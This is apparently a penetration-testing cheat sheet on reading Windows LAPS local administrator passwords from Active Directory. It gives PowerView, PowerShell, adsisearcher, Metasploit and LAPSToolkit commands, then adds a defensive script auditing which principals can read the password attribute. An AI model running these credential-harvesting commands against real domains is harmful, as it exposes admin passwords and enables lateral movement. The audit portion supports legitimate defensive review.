LAPS Password Read

Reading the LAPS password with various methods

Powerview

Get-NetComputer | Select-Object 'name','ms-mcs-admpwd'
Get-DomainComputer -Identity <COMPUTER_NAME> -Properties ms-Mcs-AdmPwd

PowerShell

Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'

Native

([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}

Metasploit

use post/windows/gather/credentials/enum_laps

LAPSToolkit

$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

Get-LAPSComputers -Credential $cred
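
Every method above returns a value only for accounts that are allowed to read the confidential ms-Mcs-AdmPwd attribute. The following is an added example, not from the original page or from any of the tools listed, that audits which principals hold that right on each OU. It assumes the ActiveDirectory RSAT module and the legacy LAPS schema extension, and it covers OU-level ACEs only (not CN=Computers or ACEs set directly on computer objects).

```powershell
# Added example: report principals that can read ms-Mcs-AdmPwd via OU ACLs.
# Assumes the ActiveDirectory module (RSAT) and a forest with the legacy LAPS schema.
Import-Module ActiveDirectory

# Look up the attribute's schemaIDGUID in this forest's schema.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr = Get-ADObject -SearchBase $schemaNC `
    -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $attr) { throw 'ms-Mcs-AdmPwd not found in schema (legacy LAPS not deployed?)' }

$pwdGuid = [guid]$attr.schemaIDGUID
$allGuid = [guid]::Empty   # ACE applies to all properties / all extended rights

# A confidential attribute is readable only with ReadProperty AND control access
# (ExtendedRight). GenericAll includes both bits, so it is matched as well.
$need = [System.DirectoryServices.ActiveDirectoryRights]'ReadProperty, ExtendedRight'

$findings = Get-ADOrganizationalUnit -Filter * | ForEach-Object {
    $ou = $_.DistinguishedName
    (Get-Acl -Path "AD:\$ou").Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.ObjectType -in $pwdGuid, $allGuid -and
        ($_.ActiveDirectoryRights -band $need) -eq $need
    } | ForEach-Object {
        [pscustomobject]@{
            OU        = $ou
            Principal = $_.IdentityReference
            Rights    = $_.ActiveDirectoryRights
            Inherited = $_.IsInherited
        }
    }
}

# Review anything that is not an expected admin or helpdesk group.
$findings | Sort-Object OU, Principal | Format-Table -AutoSize
```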
